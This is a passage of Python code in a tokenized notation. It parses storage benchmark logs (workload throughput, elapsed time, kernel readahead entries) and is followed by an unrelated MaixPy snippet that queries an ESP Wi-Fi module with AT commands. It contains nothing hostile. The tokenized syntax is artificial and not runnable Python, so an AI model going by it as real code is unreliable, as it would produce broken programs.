f.readlines()<block_start><if_stmt>data<eq><none><block_start>match=start.match(line)<if_stmt>match<block_start>curr_workload=match.group(1)<line_sep>ops=match.group(4)<line_sep>values_dict.setdefault(curr_workload 0)<line_sep>values_dict[curr_workload]<augadd>int(ops)<line_sep>total_occ_dict.setdefault(curr_workload 0)<line_sep>total_occ_dict[curr_workload]<augadd>1<line_sep>data=<none><block_end>match=rwrandomstart.match(line)<if_stmt>match<block_start>curr_workload='readrandomwriterandom'<line_sep>ops=match.group(1)<line_sep>values_dict.setdefault(curr_workload 0)<line_sep>values_dict[curr_workload]<augadd>int(ops)<line_sep>total_occ_dict.setdefault(curr_workload 0)<line_sep>total_occ_dict[curr_workload]<augadd>1<line_sep>data=<none><block_end><continue><block_end><block_end><block_end><for_stmt>key total_occ_dict.keys()<block_start>values_dict[key]<augdiv>total_occ_dict[key]<block_end><block_end><def_stmt>parse_bench_throughput values_dict fn workloads<block_start>start=re.compile(r'(read(seq|reverse)|readrandom(writerandom)?|mixgraph)\s*:.*;\s+([0-9\.]+) MB/s')<line_sep>rwrandomstart=re.compile(r'readrandomwriterandom\s*:.*;')<line_sep>elap=re.compile(r'\tElapsed \(wall clock\) time \(h:mm:ss or m:ss\): (\d+):([\d\.]+)')<line_sep>end=re.compile(r'\tExit status: \d+')<with_stmt>open(fn)<as>f<block_start>data=<none><for_stmt>line f.readlines()<block_start><if_stmt>data<eq><none><block_start>match=start.match(line)<if_stmt>match<block_start>curr_workload=match.group(1)<line_sep>load_set=set(workloads)<line_sep>load_set.remove(curr_workload)<line_sep>other_workload=load_set.pop()<line_sep>workload=values_dict[(curr_workload other_workload)]<line_sep>throughput=match.group(4)<line_sep>data=[0 float(throughput)]<line_sep># jk we don't need elap time and sometimes output gets intermixed workload.append(data)<line_sep>data=<none><block_end>match=rwrandomstart.match(line)<if_stmt>match<block_start>curr_workload='readrandomwriterandom'<line_sep>load_set=set(workloads)<line_sep>load_set.remove(curr_workload)<line_sep>other_workload=load_set.pop()<line_sep>workload=values_dict[(curr_workload other_workload)]<line_sep>data=[0 1]<line_sep># jk we don't need elap time and sometimes output gets intermixed workload.append(data)<line_sep>data=<none><block_end><continue><block_end>match=elap.match(line)<if_stmt>match<block_start>sec=60<times>int(match.group(1))<line_sep>sec<augadd>float(match.group(2))<line_sep>data.insert(0 sec)<line_sep><continue><block_end>match=end.match(line)<if_stmt>match<block_start>workload.append(data)<line_sep>data=<none><block_end><block_end><block_end><block_end><def_stmt>generate_combos <block_start>wkload_combos=[]<line_sep># needs to be in same order as iterated through in generate-result-*.sh <for_stmt>seq ["readseq" "readreverse"]#for rand in ["readrandom", "readrandomwriterandom"]: #for rand in ["mixgraph"]: <block_start><for_stmt>rand ["readrandom" "readrandomwriterandom" "mixgraph"]<block_start>wkload_combos.append((seq rand))<block_end><block_end><return>wkload_combos<block_end><def_stmt>parse_detail_file dict_exp file_path<arrow>defaultdict<block_start>combos=generate_combos()<line_sep>i=0<with_stmt>open(os.path.join(os.curdir file_path))<as>f<block_start>lines=f.readlines()<line_sep>curr_exp=<none><for_stmt>line lines<block_start>values=line.split()<if_stmt>len(values)<eq>2<block_start><if_stmt>values[1]<eq>'1'<block_start>curr_exp=values[0]<while_stmt>curr_exp<not><in>combos[i]<block_start>i<augadd>1<if_stmt>i<eq>len(combos)<block_start>print(f'detail file {file_path} badly formatted')<line_sep>print(f'{curr_exp} not in combos {combos}')<line_sep>sys.exit(1)<block_end><block_end>background_exp=set(combos[i])<line_sep>background_exp.remove(curr_exp)<line_sep>background_exp=background_exp.pop()<line_sep>curr_exp=(curr_exp background_exp)<line_sep>i<augadd>1<block_end><elif_stmt>values[0]<not><in>curr_exp<block_start>print(f'detail file {file_path} badly formatted')<line_sep>sys.exit(1)<block_end><block_end><else_stmt><block_start><if_stmt>curr_exp<eq><none><block_start>print(f'detail file {file_path} badly formatted')<line_sep>sys.exit(1)<block_end>x=0<if>len(dict_exp[curr_exp])<eq>0<else>dict_exp[curr_exp][-1][0]+float(values[4])<line_sep>dict_exp[curr_exp].append([x float(values[2])])<block_end><block_end><block_end><return>dict_exp<block_end><def_stmt>parse_kern_log_file file_path<arrow>defaultdict<block_start>dict_exp=defaultdict(list)<with_stmt>open(os.path.join(os.curdir file_path))<as>f<block_start>lines=f.readlines()<for_stmt>line lines<block_start>values=line.split()<if_stmt>len(values)<eq>2<block_start>curr_exp=tuple(values)<block_end><elif_stmt>values[5]<eq>'readahead'<block_start>dict_exp[curr_exp].append(float(values[8]))<block_end><block_end><block_end><return>dict_exp<block_end><def_stmt>mean arr<block_start><return>sum(arr)/len(arr)<block_end>
# This file is part of MaixPY # Copyright (c) sipeed.com # # Licensed under the MIT license: # http://www.opensource.org/licenses/mit-license.php # <import_from_stmt>network_espat wifi<line_sep>wifi.reset()<line_sep>print(wifi.at_cmd("AT\r\n"))<line_sep>print(wifi.at_cmd("AT+GMR\r\n"))<line_sep>''' >>> reset... b'\r\n\r\nOK\r\n' b'AT version:1.1.0.0(May 11 2016 18:09:56)\r\nSDK version:1.5.4(baaeaebb)\r\ncompile time:May 20 2016 15:06:44\r\nOK\r\n' MicroPython v0.5.1-136-g039f72b6c-dirty on 2020-11-18; Sipeed_M1 with kendryte-k210 Type "help()" for more information. >>> '''<line_sep>